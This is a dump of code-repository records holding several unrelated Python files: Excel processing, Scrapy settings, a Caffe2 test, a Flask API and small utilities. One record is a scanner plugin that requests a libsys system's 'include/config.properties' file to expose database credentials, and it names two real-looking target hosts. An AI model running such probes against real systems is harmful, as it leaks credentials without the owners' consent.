blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2 values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313 values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107 values | src_encoding stringclasses 20 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 4 6.02M | extension stringclasses 78 values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
780ac2b1b0a36b778e27621d5075fea40b5faadb | 8fefd2a545f69237778aff08317b61c55d8f17d4 | /risk_scoring/Data_Collection_Code/RETURN_EQUITY.py | 951e4b77e6234172c20628c2dd4e7afc57eef46f | [] | no_license | ashnarayan13/RiskScoring | 00604e6b8f33cca2e256360331938ea64870d04a | 3f1797a12bdd661c7584fd3abaa3962c1b4aeae1 | refs/heads/master | 2021-01-22T10:50:55.562517 | 2017-08-31T07:53:57 | 2017-08-31T07:53:57 | 102,341,666 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,884 | py | import xlrd
from xlwt import Workbook
wb1 = xlrd.open_workbook("/home/ashwath/PycharmProjects/risk_scoring/src/DataSet_Final.xlsx")
comp = wb1.sheet_by_name("CDAX")
s1 = wb1.sheet_by_name("FY-1")
s2 = wb1.sheet_by_name("FY-2")
s3 = wb1.sheet_by_name("FY-3")
s4 = wb1.sheet_by_name("FY-4")
s5 = wb1.sheet_by_name("FY-5")
s6 = wb1.sheet_by_name("FY-6")
wb2 = Workbook()
sheet1 = wb2.add_sheet("TOTAL_REVENUE")
sheet2 = wb2.add_sheet("EQUITY")
sheet3 = wb2.add_sheet("COGS")
for rows in range(2, comp.nrows):
sheet1.write(rows, 0, comp.cell_value(rows, 2))
sheet1.write(rows, 1, comp.cell_value(rows, 3))
sheet2.write(rows, 0, comp.cell_value(rows, 2))
sheet2.write(rows, 1, comp.cell_value(rows, 3))
sheet3.write(rows, 0, comp.cell_value(rows, 2))
sheet3.write(rows, 1, comp.cell_value(rows, 3))
for rows in range(3, s1.nrows):
sheet1.write(rows - 1, 2, s1.cell_value(rows, 7))
sheet1.write(rows - 1, 3, s2.cell_value(rows, 7))
sheet1.write(rows - 1, 4, s3.cell_value(rows, 7))
sheet1.write(rows - 1, 5, s4.cell_value(rows, 7))
sheet1.write(rows - 1, 6, s5.cell_value(rows, 7))
sheet1.write(rows - 1, 7, s6.cell_value(rows, 7))
sheet2.write(rows - 1, 2, s1.cell_value(rows, 19))
sheet2.write(rows - 1, 3, s2.cell_value(rows, 19))
sheet2.write(rows - 1, 4, s3.cell_value(rows, 19))
sheet2.write(rows - 1, 5, s4.cell_value(rows, 19))
sheet2.write(rows - 1, 6, s5.cell_value(rows, 19))
sheet2.write(rows - 1, 7, s6.cell_value(rows, 19))
sheet3.write(rows - 1, 2, s1.cell_value(rows, 12))
sheet3.write(rows - 1, 3, s2.cell_value(rows, 12))
sheet3.write(rows - 1, 4, s3.cell_value(rows, 12))
sheet3.write(rows - 1, 5, s4.cell_value(rows, 12))
sheet3.write(rows - 1, 6, s5.cell_value(rows, 12))
sheet3.write(rows - 1, 7, s6.cell_value(rows, 12))
wb2.save('RETURN_EQUITY.xlsx')
print("complete")
| [
"murali@fortiss.org"
] | murali@fortiss.org |
516794b1108efec8a6236ca0cb7b7bfe8e1f6a12 | f4853317939295936e224e0150e50aa2bd38879b | /project_madmuseum/project_madmuseum/settings.py | 1c406792d899465080ae6120be932829c4f2114b | [] | no_license | jessefilho/scrapyJobs | 7cd59dd00031259ffa3ea25a6b69698225cf89fc | 47cb4b781c9e8f244265a281ea933f96f368ea6f | refs/heads/master | 2020-03-29T19:43:17.382690 | 2019-01-02T20:04:23 | 2019-01-02T20:04:23 | 150,277,700 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,236 | py | # -*- coding: utf-8 -*-
# Scrapy settings for project_madmuseum project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# http://doc.scrapy.org/en/latest/topics/settings.html
# http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
# http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'project_madmuseum'
SPIDER_MODULES = ['project_madmuseum.spiders']
NEWSPIDER_MODULE = 'project_madmuseum.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'project_madmuseum (+http://www.yourdomain.com)'
# Obey robots.txt rules
ROBOTSTXT_OBEY = True
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'project_madmuseum.middlewares.ProjectMadmuseumSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'project_madmuseum.middlewares.MyCustomDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See http://scrapy.readthedocs.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html
#ITEM_PIPELINES = {
# 'project_madmuseum.pipelines.ProjectMadmuseumPipeline': 300,
#}
# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
| [
"jessefilho@Jesses-MacBook-Pro.local"
] | jessefilho@Jesses-MacBook-Pro.local |
f45d517a51288fdf1af81238bef427c053fc9fbe | f47863b3a595cbe7ec1c02040e7214481e4f078a | /plugins/scan/libsys/1530.py | 7d4393ead3d8ab208722872e6653f54514040048 | [] | no_license | gobiggo/0bscan | fe020b8f6f325292bda2b1fec25e3c49a431f373 | 281cf7c5c2181907e6863adde27bd3977b4a3474 | refs/heads/master | 2020-04-10T20:33:55.008835 | 2018-11-17T10:05:41 | 2018-11-17T10:05:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 617 | py | #!/usr/bin/python
#-*- encoding:utf-8 -*-
# title:汇文libsys图书管理系统敏感信息泄露
#http://www.wooyun.org/bugs/wooyun-2010-0125785
def assign(service, arg):
if service == "libsys":
return True, arg
def audit(arg):
payload = 'include/config.properties'
url = arg + payload
code, head,res, errcode, _ = curl.curl2(url)
if code == 200 and 'host' and 'port' and 'user' and 'password' in res:
security_warning(url)
if __name__ == '__main__':
audit(assign('libsys', 'http://www.njjnlib.cn:8080/')[1])
audit(assign('libsys', 'http://202.201.163.2:8080/')[1])
| [
"zer0i3@aliyun.com"
] | zer0i3@aliyun.com |
21ea5cf5e0b3b2984691a47e3c896c1d987cf016 | 63c5306b91db445016059a7f0c7ac167bf231d3c | /caffe2/python/operator_test/dataset_ops_test.py | ab6645e250bc558346fef1dfa56e2c3a3abfa0ce | [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"MIT"
] | permissive | Fletcher3003/caffe2 | b57ad712993b7c50d16b8f0eedc2e5587bc89e0e | 731096902a090b49612b02cc5a1301c81bf93943 | refs/heads/master | 2020-04-15T18:10:11.514190 | 2019-01-09T17:10:14 | 2019-01-09T17:10:14 | 164,903,847 | 0 | 0 | Apache-2.0 | 2019-01-09T17:02:59 | 2019-01-09T17:02:53 | Shell | UTF-8 | Python | false | false | 21,910 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import numpy as np
from caffe2.python import core, workspace, dataset
from caffe2.python.dataset import Const
from caffe2.python.schema import (
List, Field, Struct, Scalar, Map, from_blob_list, FetchRecord, NewRecord,
FeedRecord
)
from caffe2.python.test_util import TestCase
import numpy.testing as npt
import string
from hypothesis import given
import hypothesis.strategies as st
def _assert_arrays_equal(actual, ref, err_msg):
if ref.dtype.kind in ('S', 'O', 'U'):
np.testing.assert_array_equal(actual, ref, err_msg=err_msg)
else:
np.testing.assert_allclose(
actual, ref, atol=1e-4,
rtol=1e-4, err_msg=err_msg
)
def _assert_records_equal(actual, ref):
assert isinstance(actual, Field)
assert isinstance(ref, Field)
b1 = actual.field_blobs()
b2 = ref.field_blobs()
assert (len(b1) == len(b2)), 'Records have different lengths: %d vs. %d' % (
len(b1), len(b2)
)
for name, d1, d2 in zip(ref.field_names(), b1, b2):
_assert_arrays_equal(d1, d2, err_msg='Mismatch in field %s.' % name)
@st.composite
def _sparse_features_map(draw, num_records, **kwargs):
sparse_maps_lengths = draw(
st.lists(
st.integers(min_value=1, max_value=10),
min_size=num_records,
max_size=num_records
)
)
sparse_maps_total_length = sum(sparse_maps_lengths)
sparse_keys = draw(
st.lists(
st.integers(min_value=1, max_value=100),
min_size=sparse_maps_total_length,
max_size=sparse_maps_total_length,
unique=True
)
)
sparse_values_lengths = draw(
st.lists(
st.integers(min_value=1, max_value=10),
min_size=sparse_maps_total_length,
max_size=sparse_maps_total_length
)
)
total_sparse_values_lengths = sum(sparse_values_lengths)
sparse_values = draw(
# max_value is max int64
st.lists(
st.integers(min_value=1, max_value=9223372036854775807),
min_size=total_sparse_values_lengths,
max_size=total_sparse_values_lengths
)
)
return [
sparse_maps_lengths,
sparse_keys,
sparse_values_lengths,
sparse_values,
]
@st.composite
def _dense_features_map(draw, num_records, **kwargs):
float_lengths = draw(
st.lists(
st.integers(min_value=1, max_value=10),
min_size=num_records,
max_size=num_records
)
)
total_length = sum(float_lengths)
float_keys = draw(
st.lists(
st.integers(min_value=1, max_value=100),
min_size=total_length,
max_size=total_length,
unique=True
)
)
float_values = draw(
st.lists(st.floats(),
min_size=total_length,
max_size=total_length)
)
return [float_lengths, float_keys, float_values]
@st.composite
def _dataset(draw, min_elements=3, max_elements=10, **kwargs):
schema = Struct(
# Dense Features Map
('floats', Map(
Scalar(np.int32), Scalar(np.float32)
)),
# Sparse Features Map
('int_lists', Map(
Scalar(np.int32),
List(Scalar(np.int64)),
)),
# Complex Type
('text', Scalar(str)),
)
num_records = draw(
st.integers(min_value=min_elements,
max_value=max_elements)
)
raw_dense_features_map_contents = draw(_dense_features_map(num_records))
raw_sparse_features_map_contents = draw(_sparse_features_map(num_records))
raw_text_contents = [
draw(
st.lists(
st.text(alphabet=string.ascii_lowercase),
min_size=num_records,
max_size=num_records
)
)
]
# Concatenate all raw contents to a single one
contents_raw = raw_dense_features_map_contents + raw_sparse_features_map_contents + raw_text_contents
contents = from_blob_list(schema, contents_raw)
return (schema, contents, num_records)
class TestDatasetOps(TestCase):
@given(_dataset())
def test_pack_unpack(self, input):
"""
Tests if packing and unpacking of the whole dataset is an identity.
"""
(schema, contents, num_records) = input
dataset_fields = schema.field_names()
net = core.Net('pack_unpack_net')
batch = NewRecord(net, contents)
FeedRecord(batch, contents)
packed = net.PackRecords(
batch.field_blobs(), 1,
fields=dataset_fields
)
unpacked = packed.UnPackRecords(
[], len(dataset_fields),
fields=dataset_fields
)
workspace.RunNetOnce(net)
for initial_tensor, unpacked_tensor in zip(
batch.field_blobs(), unpacked
):
npt.assert_array_equal(
workspace.FetchBlob(initial_tensor),
workspace.FetchBlob(unpacked_tensor)
)
def test_dataset_ops(self):
"""
1. Defining the schema of our dataset.
This example schema could represent, for example, a search query log.
"""
schema = Struct(
# fixed size vector, which will be stored as a matrix when batched
('dense', Scalar((np.float32, 3))),
# could represent a feature map from feature ID to float value
('floats', Map(
Scalar(np.int32), Scalar(np.float32)
)),
# could represent a multi-valued categorical feature map
('int_lists', Map(
Scalar(np.int32),
List(Scalar(np.int64)),
)),
# could represent a multi-valued, weighted categorical feature map
(
'id_score_pairs', Map(
Scalar(np.int32),
Map(
Scalar(np.int64),
Scalar(np.float32),
keys_name='ids',
values_name='scores'
),
)
),
# additional scalar information
(
'metadata', Struct(
('user_id', Scalar(np.int64)),
('user_embed', Scalar((np.float32, 2))),
('query', Scalar(str)),
)
),
)
"""
This is what the flattened fields for this schema look like, along
with its type. Each one of these fields will be stored, read and
writen as a tensor.
"""
expected_fields = [
('dense', (np.float32, 3)),
('floats:lengths', np.int32),
('floats:values:keys', np.int32),
('floats:values:values', np.float32),
('int_lists:lengths', np.int32),
('int_lists:values:keys', np.int32),
('int_lists:values:values:lengths', np.int32),
('int_lists:values:values:values', np.int64),
('id_score_pairs:lengths', np.int32),
('id_score_pairs:values:keys', np.int32),
('id_score_pairs:values:values:lengths', np.int32),
('id_score_pairs:values:values:values:ids', np.int64),
('id_score_pairs:values:values:values:scores', np.float32),
('metadata:user_id', np.int64),
('metadata:user_embed', (np.float32, 2)),
('metadata:query', str),
]
zipped = zip(
expected_fields, schema.field_names(), schema.field_types()
)
for (ref_name, ref_type), name, dtype in zipped:
self.assertEquals(ref_name, name)
self.assertEquals(np.dtype(ref_type), dtype)
"""
2. The contents of our dataset.
Contents as defined below could represent, for example, a log of
search queries along with dense, sparse features and metadata.
The datset below has 3 top-level entries.
"""
contents_raw = [
# dense
[[1.1, 1.2, 1.3], [2.1, 2.2, 2.3], [3.1, 3.2, 3.3]],
# floats
[1, 2, 3], # len
[11, 21, 22, 31, 32, 33], # key
[1.1, 2.1, 2.2, 3.1, 3.2, 3.3], # value
# int lists
[2, 0, 1], # len
[11, 12, 31], # key
[2, 4, 3], # value:len
[111, 112, 121, 122, 123, 124, 311, 312, 313], # value:value
# id score pairs
[1, 2, 2], # len
[11, 21, 22, 31, 32], # key
[1, 1, 2, 2, 3], # value:len
[111, 211, 221, 222, 311, 312, 321, 322, 323], # value:ids
[11.1, 21.1, 22.1, 22.2, 31.1, 31.2, 32.1, 32.2, 32.3], # val:score
# metadata
[123, 234, 456], # user_id
[[0.2, 0.8], [0.5, 0.5], [0.7, 0.3]], # user_embed
['dog posts', 'friends who like to', 'posts about ca'], # query
]
# convert the above content to ndarrays, checking against the schema
contents = from_blob_list(schema, contents_raw)
"""
3. Creating and appending to the dataset.
We first create an empty dataset with the given schema.
Then, a Writer is used to append these entries to the dataset.
"""
ds = dataset.Dataset(schema)
net = core.Net('init')
with core.NameScope('init'):
ds.init_empty(net)
content_blobs = NewRecord(net, contents)
FeedRecord(content_blobs, contents)
writer = ds.writer(init_net=net)
writer.write_record(net, content_blobs)
workspace.RunNetOnce(net)
"""
4. Iterating through the dataset contents.
If we were to iterate through the top level entries of our dataset,
this is what we should expect to see:
"""
entries_raw = [
(
[[1.1, 1.2, 1.3]], # dense
[1],
[11],
[1.1], # floats
[2],
[11, 12],
[2, 4],
[111, 112, 121, 122, 123, 124], # intlst
[1],
[11],
[1],
[111],
[11.1], # id score pairs
[123],
[[0.2, 0.8]],
['dog posts'], # metadata
),
(
[[2.1, 2.2, 2.3]], # dense
[2],
[21, 22],
[2.1, 2.2], # floats
[0],
[],
[],
[], # int list
[2],
[21, 22],
[1, 2],
[211, 221, 222],
[21.1, 22.1, 22.2],
[234],
[[0.5, 0.5]],
['friends who like to'], # metadata
),
(
[[3.1, 3.2, 3.3]], # dense
[3],
[31, 32, 33],
[3.1, 3.2, 3.3], # floats
[1],
[31],
[3],
[311, 312, 313], # int lst
[2],
[31, 32],
[2, 3],
[311, 312, 321, 322, 323],
[31.1, 31.2, 32.1, 32.2, 32.3], # id score list
[456],
[[0.7, 0.3]],
['posts about ca'], # metadata
),
# after the end of the dataset, we will keep getting empty vectors
([], ) * 16,
([], ) * 16,
]
entries = [from_blob_list(schema, e) for e in entries_raw]
"""
Let's go ahead and create the reading nets.
We will run `read` net multiple times and assert that we are reading the
entries the way we stated above.
"""
read_init_net = core.Net('read_init')
read_next_net = core.Net('read_next')
reader = ds.reader(read_init_net)
should_continue, batch = reader.read_record(read_next_net)
workspace.RunNetOnce(read_init_net)
workspace.CreateNet(read_next_net, True)
for entry in entries:
workspace.RunNet(str(read_next_net))
actual = FetchRecord(batch)
_assert_records_equal(actual, entry)
"""
5. Reading/writing in a single plan
If all of operations on the data are expressible as Caffe2 operators,
we don't need to load the data to python, iterating through the dataset
in a single Plan.
Where we will process the dataset a little and store it in a second
dataset. We can reuse the same Reader since it supports reset.
"""
reset_net = core.Net('reset_net')
reader.reset(reset_net)
read_step, batch = reader.execution_step()
""" We will add the line number * 1000 to the feature ids. """
process_net = core.Net('process')
line_no = Const(process_net, 0, dtype=np.int32)
const_one = Const(process_net, 1000, dtype=np.int32)
process_net.Add([line_no, const_one], [line_no])
field = batch.floats.keys.get()
process_net.Print(field, [])
process_net.Add([field, line_no], field, broadcast=1, axis=0)
""" Lets create a second dataset and append to it. """
ds2 = dataset.Dataset(schema, name='dataset2')
ds2.init_empty(reset_net)
writer = ds2.writer(reset_net)
writer.write_record(process_net, batch)
# commit is not necessary for DatasetWriter but will add it for
# generality of the example
commit_net = core.Net('commit')
writer.commit(commit_net)
""" Time to create and run a plan which will do the processing """
plan = core.Plan('process')
plan.AddStep(core.execution_step('reset', reset_net))
plan.AddStep(read_step.AddNet(process_net))
plan.AddStep(core.execution_step('commit', commit_net))
workspace.RunPlan(plan)
"""
Now we should have dataset2 populated.
"""
ds2_data = FetchRecord(ds2.content())
field = ds2_data.floats.keys
field.set(blob=field.get() - [1000, 2000, 2000, 3000, 3000, 3000])
_assert_records_equal(contents, ds2_data)
"""
6. Slicing a dataset
You can create a new schema from pieces of another schema and reuse
the same data.
"""
subschema = Struct(('top_level', schema.int_lists.values))
int_list_contents = contents.int_lists.values.field_names()
self.assertEquals(len(subschema.field_names()), len(int_list_contents))
"""
7. Random Access a dataset
"""
read_init_net = core.Net('read_init')
read_next_net = core.Net('read_next')
idx = np.array([2, 1, 0])
indices_blob = Const(read_init_net, idx, name='indices')
reader = ds.random_reader(read_init_net, indices_blob)
reader.computeoffset(read_init_net)
should_stop, batch = reader.read_record(read_next_net)
workspace.CreateNet(read_init_net, True)
workspace.RunNetOnce(read_init_net)
workspace.CreateNet(read_next_net, True)
for i in range(len(entries)):
k = idx[i] if i in idx else i
entry = entries[k]
workspace.RunNet(str(read_next_net))
actual = FetchRecord(batch)
_assert_records_equal(actual, entry)
workspace.RunNet(str(read_next_net))
self.assertEquals(True, workspace.FetchBlob(should_stop))
"""
8. Random Access a dataset with loop_over = true
"""
read_init_net = core.Net('read_init')
read_next_net = core.Net('read_next')
idx = np.array([2, 1, 0])
indices_blob = Const(read_init_net, idx, name='indices')
reader = ds.random_reader(read_init_net, indices_blob, loop_over=True)
reader.computeoffset(read_init_net)
should_stop, batch = reader.read_record(read_next_net)
workspace.CreateNet(read_init_net, True)
workspace.RunNetOnce(read_init_net)
workspace.CreateNet(read_next_net, True)
for _ in range(len(entries) * 3):
workspace.RunNet(str(read_next_net))
self.assertEquals(False, workspace.FetchBlob(should_stop))
"""
9. Sort and shuffle a dataset
This sort the dataset using the score of a certain column,
and then shuffle within each chunk of size batch_size * shuffle_size
before shuffling the chunks.
"""
read_init_net = core.Net('read_init')
read_next_net = core.Net('read_next')
reader = ds.random_reader(read_init_net)
reader.sort_and_shuffle(read_init_net, 'int_lists:lengths', 1, 2)
reader.computeoffset(read_init_net)
should_continue, batch = reader.read_record(read_next_net)
workspace.CreateNet(read_init_net, True)
workspace.RunNetOnce(read_init_net)
workspace.CreateNet(read_next_net, True)
expected_idx = np.array([2, 1, 0])
for i in range(len(entries)):
k = expected_idx[i] if i in expected_idx else i
entry = entries[k]
workspace.RunNet(str(read_next_net))
actual = FetchRecord(batch)
_assert_records_equal(actual, entry)
def test_last_n_window_ops(self):
collect_net = core.Net('collect_net')
collect_net.GivenTensorFill(
[],
'input',
shape=[3, 2],
values=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0],
)
input_array =\
np.array(list(range(1, 7)), dtype=np.float32).reshape(3, 2)
workspace.CreateBlob('output')
workspace.FeedBlob('next', np.array(0, dtype=np.int32))
collect_net.LastNWindowCollector(
['output', 'next', 'input'],
['output', 'next'],
num_to_collect=7,
)
plan = core.Plan('collect_data')
plan.AddStep(
core.execution_step('collect_data', [collect_net],
num_iter=1)
)
workspace.RunPlan(plan)
reference_result = workspace.FetchBlob('output')
npt.assert_array_equal(input_array, reference_result)
plan = core.Plan('collect_data')
plan.AddStep(
core.execution_step('collect_data', [collect_net],
num_iter=2)
)
workspace.RunPlan(plan)
reference_result = workspace.FetchBlob('output')
npt.assert_array_equal(input_array[[1, 2, 2, 0, 1, 2, 0]],
reference_result)
plan = core.Plan('collect_data')
plan.AddStep(
core.execution_step('collect_data', [collect_net],
num_iter=3)
)
workspace.RunPlan(plan)
reference_result = workspace.FetchBlob('output')
npt.assert_array_equal(input_array[[2, 0, 1, 2, 2, 0, 1]],
reference_result)
def test_collect_tensor_ops(self):
init_net = core.Net('init_net')
blobs = ['blob_1', 'blob_2', 'blob_3']
bvec_map = {}
ONE = init_net.ConstantFill([], 'ONE', shape=[1, 2], value=1)
for b in blobs:
init_net.ConstantFill([], [b], shape=[1, 2], value=0)
bvec_map[b] = b + '_vec'
init_net.CreateTensorVector([], [bvec_map[b]])
reader_net = core.Net('reader_net')
for b in blobs:
reader_net.Add([b, ONE], [b])
collect_net = core.Net('collect_net')
num_to_collect = 1000
max_example_to_cover = 100000
bvec = [bvec_map[b] for b in blobs]
collect_net.CollectTensor(
bvec + blobs,
bvec,
num_to_collect=num_to_collect,
)
print('Collect Net Proto: {}'.format(collect_net.Proto()))
plan = core.Plan('collect_data')
plan.AddStep(core.execution_step('collect_init', init_net))
plan.AddStep(
core.execution_step(
'collect_data', [reader_net, collect_net],
num_iter=max_example_to_cover
)
)
workspace.RunPlan(plan)
# concat the collected tensors
concat_net = core.Net('concat_net')
bconcated_map = {}
bsize_map = {}
for b in blobs:
bconcated_map[b] = b + '_concated'
bsize_map[b] = b + '_size'
concat_net.ConcatTensorVector([bvec_map[b]], [bconcated_map[b]])
concat_net.TensorVectorSize([bvec_map[b]], [bsize_map[b]])
workspace.RunNetOnce(concat_net)
# check data
reference_result = workspace.FetchBlob(bconcated_map[blobs[0]])
self.assertEqual(
reference_result.shape,
(min(num_to_collect, max_example_to_cover), 2)
)
size = workspace.FetchBlob(bsize_map[blobs[0]])
self.assertEqual(tuple(), size.shape)
self.assertEqual(min(num_to_collect, max_example_to_cover), size.item())
hist, _ = np.histogram(
reference_result[:, 0],
bins=10,
range=(1, max_example_to_cover)
)
print('Sample histogram: {}'.format(hist))
self.assertTrue(all(hist > 0.6 * (num_to_collect / 10)))
for i in range(1, len(blobs)):
result = workspace.FetchBlob(bconcated_map[blobs[i]])
self.assertEqual(reference_result.tolist(), result.tolist())
if __name__ == "__main__":
import unittest
unittest.main()
| [
"charliehouseago@gmail.com"
] | charliehouseago@gmail.com |
8b7502a2975dab74af3056b8712ffcf0fb3e4eb8 | 667bf1d4802030d16d62dc27fcbd0196944e63b3 | /app/answer.py | 628d7fe1dec6d853173cded4341794f1f6f36fcb | [
"MIT"
] | permissive | kaiwk/forum-wechat | f8e78b03786e8fd27ef1774c5cacf83d2816bcfd | bdd5439b7d243c1678de522a63f36469423044ce | refs/heads/master | 2022-12-24T08:54:25.539142 | 2018-12-19T15:20:26 | 2018-12-19T15:20:26 | 159,819,534 | 0 | 0 | MIT | 2022-12-08T01:28:25 | 2018-11-30T12:19:18 | Python | UTF-8 | Python | false | false | 1,850 | py | from flask import Blueprint, jsonify, request
from sqlalchemy.orm.exc import NoResultFound
from app.database import Answer
from . import get_logger
log = get_logger()
bp = Blueprint('answer', __name__)
@bp.route('/<int:answer_id>', methods=['GET'])
def get_answer(answer_id):
try:
answer = Answer.query.get(answer_id)
except NoResultFound as e:
log.error(e)
return jsonify({
'status': 404,
'code': 1,
'msg': 'no answer found'
})
return jsonify({
'status': 200,
'code': 0,
'msg': 'get success',
'answer': {
'id': answer.id,
'user_id': answer.user_id,
'question_id': answer.question_id,
'content': answer.content,
'anonymous': answer.anonymous
}
})
@bp.route('/<int:answer_id>/comments', methods=['GET'])
def get_comments(answer_id):
try:
answer = Answer.query.get(answer_id)
except NoResultFound as e:
log.error(e)
return jsonify({
'status': 404,
'code': 1,
'msg': 'no answer found'
})
return jsonify({
'status': 200,
'code': 0,
'msg': "get success",
'data': [a.as_dict() for a in answer.comments.all()]
})
@bp.route('/', methods=['POST'])
def create_answer():
user_id = request.json['user_id']
question_id = request.json['question_id']
anonymous = request.json['anonymous']
content = request.json['content']
answer = Answer.save(content, anonymous, user_id, question_id)
return jsonify({
'status': 201,
'code': 0,
'msg': 'answer created',
'answer': {
'id': answer.id,
'content': answer.content,
'anonymous': answer.anonymous
}
})
| [
"kaiwkx@gmail.com"
] | kaiwkx@gmail.com |
88cd07b5a55a1d8ac1a11d50651d3052496b91a9 | f585bfd9b7b8b64aad59fd4ec8850bb03c4517e8 | /Translator/handlers/request_handlers.py | 0333cc82bca94834140cd5eeea2f8b016656e156 | [] | no_license | StefanEvanghelides/eai2019 | 62a7d57fc079893e71a74a7a763d19302f733e01 | 25ef13cd52cba35e335e64f40d80f461d1f5faf4 | refs/heads/master | 2020-09-10T18:44:51.608371 | 2020-08-02T09:32:45 | 2020-08-02T09:32:45 | 221,801,906 | 0 | 0 | null | 2020-08-02T09:32:46 | 2019-11-14T23:02:00 | Python | UTF-8 | Python | false | false | 396 | py | import json
def handle_product_translation(translators, message, headers, queues):
message = json.loads(message)
target_locale = message["locale"]
translated = translators[target_locale].translate(message)
print("translated message to %s" % target_locale)
queues["message-bus"].send(
body=json.dumps(translated), headers=headers, destination="message-bus-in"
)
| [
"r.m.van.buijtenen@student.rug.nl"
] | r.m.van.buijtenen@student.rug.nl |
c4a24a1f172e7a208fc8fb301452a2d6d42c5fb5 | 8df93619349f2261cc8b542b584d1ca3ecbe3c70 | /Dependency/_utils.py | 24cca3f185d99e4a19e841db4310ee04f481e85f | [] | no_license | AlisonYS/Python | 0e5dc4b95ab5572414957bc3bf46aa03a6c6266f | b846040ba4b32f85c6842d962f50167e353cb6c0 | refs/heads/master | 2021-01-25T07:00:50.561080 | 2018-06-25T13:49:41 | 2018-06-25T13:49:41 | 93,635,885 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,346 | py | from os import walk
import re
def getFileListWithJava(path):
for (dirpath, dirnames, filenames) in walk(path):
for name in filenames:
if name.endswith(".java") and (name is not "R.java"):
myfile = open(dirpath +"/"+ name)
content = myfile.readlines()
for line in content:
if line.startswith('package '):
_str = line[line.find('package ') + len('package '):-2]
package_name = '"' + _str + '.' + name[0:-5] +'"'
lines = len(content)
print name,lines,package_name
yield name,lines,package_name
# "@com.alipay.mobile.ui:drawable/announcement_close_normal"
# "com.alipay.mobile.ui.R.drawable.qr_default"
def getPubliceResource(filepath):
myfile = open(filepath)
content = myfile.readlines()
xml_name = '@com.alipay.mobile.ui:%s/%s'
java_name = 'com.alipay.mobile.ui.R.%s.%s'
for line in content:
typeArray = re.findall('type="(.*?)"',line)
nameArray = re.findall('name="(.*?)"',line)
if len(typeArray) != 0:
r_type = typeArray[0]
r_name = nameArray[0]
if (r_type != 'attr'):
xml = '"' + xml_name % (r_type, r_name) + '"'
java = '"' + java_name % (r_type, r_name) + '"'
yield r_name, xml, java
if __name__ == '__main__':
for resourc, xml,java, in getPubliceResource("/Users/xuanmu/work/mpaas-ui/ui/widget/res/values/public.xml"):
print resourc, xml, java
| [
"xuanmu.ys@alipay.com"
] | xuanmu.ys@alipay.com |
